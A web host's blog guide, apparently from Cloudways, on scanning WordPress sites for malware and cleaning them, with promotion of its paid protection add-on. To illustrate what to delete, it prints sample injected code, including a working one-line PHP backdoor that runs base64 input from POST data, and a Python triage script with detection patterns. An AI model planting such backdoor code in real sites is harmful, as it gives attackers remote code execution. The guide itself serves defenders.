Due to its popularity, WordPress is a regular target for cyberattacks. Research suggests that around 4.7 million WordPress sites are hacked annually.
In March 2024, over 3,000 WordPress websites using the popular Popup Builder plugin were compromised. The vulnerability, tracked as CVE-2023-6000, was exploited to redirect users to malicious websites.
Alarming, right?
In this article, we’ll discuss the importance of detecting and removing malware and guide you through multiple easy methods of scanning and removing malware from a WordPress site.
Let’s get started!
Why Is Malware Detection and Removal Crucial?
Despite robust security measures, WordPress sites are still susceptible to various forms of malware, such as viruses, worms, Trojan horses, or spyware. Malware often infiltrates sites through malicious plugins or themes.
For example, in February 2024, over 25,000 websites using the Bricks theme were vulnerable to attack due to a critical remote code execution (RCE) flaw, CVE-2024-25600. This bug, with a severity rating of 9.8 out of 10, allowed attackers to take over websites without user credentials.
Vulnerabilities in the core WordPress or server software can also serve as entry points.
Once a site is infected, attackers can cause serious damage: deleting files, injecting spam links, and stealing sensitive information like passwords and credit card numbers. This can lead to downtime and a loss of customer trust, severely impacting business.
Given these risks, understanding and implementing malware detection and removal is essential.
With that said, let’s look at how you can detect if your WordPress site has been compromised.
How to Check for Malware on Your WordPress Site?
The longer malware stays on your site, the more damage it can cause, and it may spread to other websites. If the infection is not addressed quickly, your WordPress hosting service might suspend your account, and search engines like Google could blacklist your site.
There are several ways to scan a WordPress site for malware. Below, we’ll explore the most popular methods for detecting WordPress malware.
Option #1: Scan for Malware via a Plugin
There are multiple WordPress anti-malware plugins available that you can use to scan your site for malware.
For example, Wordfence Security is a popular free plugin that can scan for malicious code, backdoors, and shells that hackers may have installed. However, the free version does have some limitations.
Install and activate it like any other WordPress plugin. Then, go to its settings and click the Start New Scan button.
Once the scan is complete, Wordfence will display the results, notifying you of any suspicious code, infections, malware, or corrupted files on your website. It will also recommend actions to fix these issues.
When I ran the scan, it found multiple critical errors on my site. To address these errors, I clicked the Repair All Repairable Files button.
That said, the safety of third-party WordPress plugins varies based on the developer’s reputation, code quality, and maintenance. While many plugins are safe and useful, it’s important to exercise caution when selecting and using them.
Option #2: Scan for Malware Using Online Tools
You can also use online malware scanners to check your website for hacks. For instance, IsItWP’s Malware Scanner, powered by Sucuri, is a good option.
That said, it’s important to remember that online scanners can only check publicly visible files. If the malware is hidden in other files, these scanners may not detect it.
You can also check Google’s Transparency Report to see if your website has been blacklisted.
Another option is to use Google Search Console, which regularly scans your website for problems.
Option #3: Scan for Malware Infections Manually
Another option is to scan your website for malware manually, but this is best left to security experts because the process is complex and malware is often stealthy.
However, if you need to proceed, look for recently modified files using an FTP client like FileZilla. Check for any unusual file modifications, as this could indicate malware.
Additionally, verify the integrity of your WordPress core files by downloading the same version from WordPress.org and comparing them with your site’s files. Any discrepancies could be a sign of malware.
This approach is way more time-consuming than a plugin or a dedicated malware detection tool.
Option #4: Scan for Malware on Cloudways
If you’re a Cloudways customer and want to keep your site safe from malware, you can leverage our Malware Protection add-on powered by Imunify360.
Our add-on sits above the application layer and helps automatically remove detected malware—you don’t have to manually run scans. It starts at just $4/app per month.
It also comes with RASP (Runtime Active Self Protection), which helps detect and eliminate threats at runtime by scanning files whenever changes are made. This eliminates malicious code before it can damage your apps.
How to Remove Malware from WordPress Site?
There are multiple methods to remove malware from a WordPress site. For this blog, we’ll look at three different methods:
Method #1: Remove Malware from WordPress Manually
Note: Manual malware removal from a WordPress site is not recommended unless you are a security expert, as accidentally deleting a crucial file could break your entire site.
💡 It’s highly recommended that you activate the Malware Protection Add-on if you’re a Cloudways customer or use a malware removal plugin.
However, if you’d like to go with a manual cleanup, here’s a step-by-step guide to help you through the process.
Step #1: Back up Your Website
First, make sure you have a backup of your WordPress site. This way, if anything breaks while you’re cleaning things up, you can easily fix it.
If you’re a Cloudways customer, backing up your application is easy. To take an on-demand manual backup, open Servers from the main Cloudways dashboard and choose your target server. Then, click on Backup → Take Backup Now.
You can also use plugins to take backups. The WordPress plugin repository offers many options, including UpdraftPlus, BlogVault, BackWPup, and Solid Backups.
Step #2: Download Fresh Copies of WordPress Core, Themes, and Plugins
Download fresh files from the WordPress repository. Make sure to download the same versions that are installed on your site. For example, download the WordPress Core from the official website.
Similarly, download fresh versions of themes and plugins. This will help you identify and replace infected files with clean ones.
Step #3: Reinstall WordPress Core Files
In the previous step, we downloaded a clean version of WordPress. You can now use the clean version to replace the core WordPress files and remove malware from your WordPress site.
To do this, access your site files through cPanel or SFTP and replace the wp-admin and wp-includes folders. These folders do not contain user content and can be safely replaced.
After this, inspect the following files for any signs of malware:
- index.php
- wp-settings.php
- wp-load.php
- wp-config.php
- .htaccess
Since there isn’t a single type of malware to look for, you need to ensure any suspicious code is indeed malware before removing it. For example, if you come across code like this:
```php
eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdleGFtcGxlX2Z1bmN0aW9uJykpeyBleGFtcGxlX2Z1bmN0aW9uKCk7fQ=='));
```
It’s likely malicious and should be deleted. Additionally, check the wp-uploads folder. If you find any PHP files there, delete them immediately, as this folder is not intended to contain PHP files.
Step #4: Clean and Replace Theme and Plugin Files
Identify any suspicious or recently modified theme and plugin files. Use clean copies of these files and compare them to those on your site. Replace any files that contain malicious code.
Theme and plugin files are located in the wp-content folder. Carefully review each file, comparing them to fresh versions to identify suspicious code.
Here’s an example comparison between a clean plugin file and one that has been compromised with malware:
Clean Plugin File:
```php
<?php
/**
 * Plugin Name: Example Plugin
 * Description: This is a clean example plugin.
 * Version: 1.0
 * Author: Plugin Author
 */

// Your plugin code here
function example_plugin_function() {
    echo "This is a clean plugin function.";
}
add_action('wp_footer', 'example_plugin_function');
?>
```
Compromised Plugin File:
```php
<?php
/**
 * Plugin Name: Example Plugin
 * Description: This is a clean example plugin.
 * Version: 1.0
 * Author: Plugin Author
 */

// Your plugin code here
function example_plugin_function() {
    echo "This is a clean plugin function.";
}
add_action('wp_footer', 'example_plugin_function');

// Malicious code added
if (file_exists('malicious_file.php')) {
    include('malicious_file.php');
}
eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdleGFtcGxlX2Z1bmN0aW9uJykpeyBleGFtcGxlX2Z1bmN0aW9uKCk7fQ=='));
?>
```
Step #5: Purge Malware from the Database
Remove malware from the database. Use your database admin panel to search for suspicious content, focusing on the wp_options and wp_posts tables.
When you find a table with suspicious content, open it and manually delete the unwanted entries. For example, if you see something like this in the wp_options table:
| option_id | option_name | option_value | autoload |
|---|---|---|---|
| 1 | siteurl | http://yourwebsite.com | yes |
| 2 | home | http://yourwebsite.com | yes |
| 3 | malicious_option | aWYoZnVuY3Rpb25fZXhpc3RzKCdleGFtcGxlX2Z1bmN0aW9uJykpeyBleGFtcGxlX2Z1bmN0aW9uKCk7fQ== | yes |
Delete the malicious_option entry.
After cleaning, test your website to ensure it’s still functional and everything works properly.
Step #6: Patch Vulnerabilities
By now, you’ve successfully removed malware from your WordPress site. To safeguard your WordPress site from future attacks, you must patch vulnerabilities that hackers could exploit.
These vulnerabilities, often hidden within your website’s code, allow hackers to inject malware and gain access to your site.
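To find and remove these gaps, search your code for common indicators like eval, preg_replace, str_replace, base64_decode, and gzinflate, or for less common ones like wp-content.old.tmp.
These functions also appear in legitimate code, so, as in Step #3, confirm that a match is actually malicious before acting on it. If you find any suspicious usage, delete it.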
For example, if you encounter code like this:
```php
if (isset($_POST['data'])) {
    eval(base64_decode($_POST['data']));
}
```
This is a typical backdoor method that should be removed immediately.
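The checks from Steps #3, #5, and #6 can be combined into one triage pass that decodes base64 payloads for reading, never executing them, so you can confirm what a match does before deleting it. This is an added example, not code from the original article. The patterns, finding labels, sample paths, and the `source` naming convention (`wp_options:<name>` for database values) are assumptions, and the inputs are constructed from the snippets shown in this guide.

```python
import base64
import re

# eval(base64_decode('<literal>')): the literal can be decoded and read safely.
EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")
# eval() fed from request data: the backdoor shape shown in Step #6.
EVAL_REQUEST = re.compile(r"eval\s*\([^;]*\$_(POST|GET|REQUEST|COOKIE)\b")
# A value that is nothing but base64, like the wp_options row in Step #5.
BARE_B64 = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_b64(blob):
    """Decode for reading only (nothing is executed); None if not base64 text."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def triage(source, text):
    """Return (source, finding, evidence) tuples for a human to confirm."""
    findings = []
    for match in EVAL_B64.finditer(text):
        findings.append((source, "eval of base64 literal", decode_b64(match.group(1))))
    if EVAL_REQUEST.search(text):
        findings.append((source, "eval of request input", None))
    value = text.strip()
    if BARE_B64.fullmatch(value):
        decoded = decode_b64(value)
        if decoded and re.search(r"\w+\s*\(", decoded):
            findings.append((source, "base64 value hiding code", decoded))
    # Assumption: uploads live in the default wp-content/uploads directory.
    if "/uploads/" in source and source.endswith(".php"):
        findings.append((source, "PHP file under uploads", None))
    return findings


# Constructed inputs modelled on this guide's snippets; paths are hypothetical.
PAYLOAD = ("aWYoZnVuY3Rpb25fZXhpc3RzKCdleGFtcGxlX2Z1bmN0aW9uJykpeyBl"
           "eGFtcGxlX2Z1bmN0aW9uKCk7fQ==")
SAMPLES = {
    "wp-content/plugins/example/example.php":
        "add_action('wp_footer', 'f'); eval(base64_decode('" + PAYLOAD + "'));",
    "wp-content/themes/demo/functions.php":
        "if (isset($_POST['data'])) { eval(base64_decode($_POST['data'])); }",
    "wp_options:malicious_option": PAYLOAD,
    "wp_options:siteurl": "http://yourwebsite.com",
    "wp-content/uploads/2024/03/cache.php": "<?php // placeholder body",
    "wp-includes/load.php": "<?php // unmodified core file",
}


def run_demo():
    return [f for src, text in SAMPLES.items() for f in triage(src, text)]
```

Calling `run_demo()` returns four findings; the `siteurl` row and the unmodified core file produce none, and the decoded evidence shows exactly what the encoded payload would have run.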
Step #7: Reupload Cleaned Files
After completing your clean-up, the next step is to reupload the cleaned files to your website. This process is similar to manually restoring a backup, and you can use cPanel or SFTP to do this.
Start by deleting the files and tables that you intend to replace.
For example, if you have cleaned versions of index.php and wp-config.php, delete the existing versions of these files from your server. Then, upload the cleaned versions of index.php and wp-config.php to their respective locations.
Step #8: Clear the Cache
Clearing the cache eliminates any cached versions of your site that might still contain remnants of malware, ensuring your site is thoroughly clean.
Step #9: Change All Passwords and Access Keys
Hackers often use malware to launch brute-force attacks on administrator accounts. Changing your passwords can help slow them down and protect your WordPress site. Use strong, unique passwords for each account.
The following accounts and credentials should be updated as soon as possible:
- Hosting account
- FTP accounts
- wp-admin credentials
- WP Salts
- SSH accounts
Step #10: Disable Themes or Plugins
To check if your themes or plugins contain malware, turn them off one by one and see if your website works normally. This helps identify infected ones.
At the same time, make sure to use a reliable malware scanner to check your website thoroughly. This scan confirms that all traces of malware have been removed.
If you’re a Cloudways customer, consider getting the Malware Protection add-on. While you can also use plugins or other tools to remove malware, you risk leaving backdoors open.
Method #2: Remove Malware from WordPress via a Plugin
Previously, we mentioned using Wordfence to scan for malware. Now, let’s review how to remove malware using the Wordfence Security plugin.
Initial Scan
Navigate to the Wordfence Scan menu and click Start Scan. This will initiate an initial scan and present you with various results.
Each result will provide details on what Wordfence found and guide you through resolving the issues.
Deep Scan
Once the initial scan is complete and you’ve addressed the issues, perform a deeper scan. Go to the All Options menu on the left.
Scroll down to the Basic Scan Type Options section and check the box for High Sensitivity. This deeper scan takes longer but can detect more stubborn malware.
Custom Scans
For additional scans, use the All Options page to customize your Wordfence scan according to your needs.
Review Results
Carefully review the files identified as potentially containing malware. If you see anything suspicious, try to remove the harmful code without deleting the entire file. Remember, you can always restore from a backup if needed.
Check Core, Theme, and Plugin Files
Review any changes in core, theme, and plugin files. Wordfence provides options to compare these files with their original versions. Use the Wordfence option to repair the files if you find malicious changes.
Final Scan
Work through the list until it is empty, then run another scan to confirm your site is clean. But as we mentioned earlier, using malware protection plugins might not be the safest option.
Method #3: Remove Malware via Cloudways Malware Protection Add-on
Malware Protection Add-on powered by Imunify360 automatically identifies and removes malicious code from your application’s files and database. It offers protection through real-time scans, scheduled scans, and automated cleanup.
Benefits of Cloudways Malware Protection Add-on
- Identify and block phishing attacks in real time.
- Shield your system from all types of malicious attacks.
- Automatically clean up infected fields in the database.
- Clean up infected files automatically.
- Block malware injection in real-time.
- Perform on-demand scans of your applications as needed.
- Automated malware protection detects and cleans malware seamlessly.
How to Enable and Use the Malware Protection Add-on
- Go to App Management for your selected app.
- Find the Malware Protection menu.
- Click on Enable Protection.
Once the add-on is activated, it will automatically remove any detected malware from your applications, which can be viewed under the Malicious tab.
Additionally, you can:
- Access the Scan History section to review the timing and results of past scans.
- In the Proactive Defence section, view malicious events that were detected and eliminated in real-time.
- If needed, select a file and click the restore button to recover a cleaned file.
When comparing our add-on with Method #1 and Method #2, it’s clear that our WordPress malware removal option is both more streamlined and secure.
Most WordPress malware scanners, which operate as plugins, have inherent flaws. They function within the same server environment as the WordPress site and the malware, making them susceptible to manipulation or disabling.
In contrast, Cloudways’ malware protection add-on operates at the server level, outside the application layer. This ensures better detection, protection, and reliability.
How to Remove Malware Warnings from Google?
If Google spots malware on your site, it puts up a warning to keep users safe. But this also scares potential visitors and can hurt your website’s reputation. Plus, other search engines and web hosts might blacklist your site too.
To solve this problem, you can ask Google for a review. But first, ensure your website is completely free of malware.
Follow these steps to take your site off Google’s blacklist:
- Check your website thoroughly for any malware.
- Log in to your Google Search Console account.
- Go to the Security Issues section and scroll down.
- Click on Request a review.
- Fill in the form detailing the steps you took to fix the problems.
- Submit your request.
Please be patient. Google needs a few days to review your request. Avoid repeatedly checking or asking about it, as this could worsen things.
Summary
Keeping your WordPress site safe from malware is crucial to protect your data, reputation, and visitor experience.
By following the steps in this guide, you’ll be well-equipped to identify and remove malware threats. Remember, taking proactive measures like regular scans and backups is the best defense.
If you’re a Cloudways user, the Malware Protection add-on (for just $4/app/month) provides an extra layer of security and convenience.
Q1. Why does my WordPress site keep getting infected?
Outdated software is like an open door for malware! Regularly update WordPress, plugins, themes, and anything else installed to keep those doors shut.
If keeping up with scans feels overwhelming, consider the Cloudways Malware Protection add-on. It automatically removes malware, making life easier.
Q2. How to remove malware from WordPress?
- Back up your site (most important!)
- Download fresh WordPress files.
- Replace infected core files.
- Clean up code and database entries.
- Patch vulnerabilities.
- Re-upload cleaned files.
- Change all passwords.
Abdul Rehman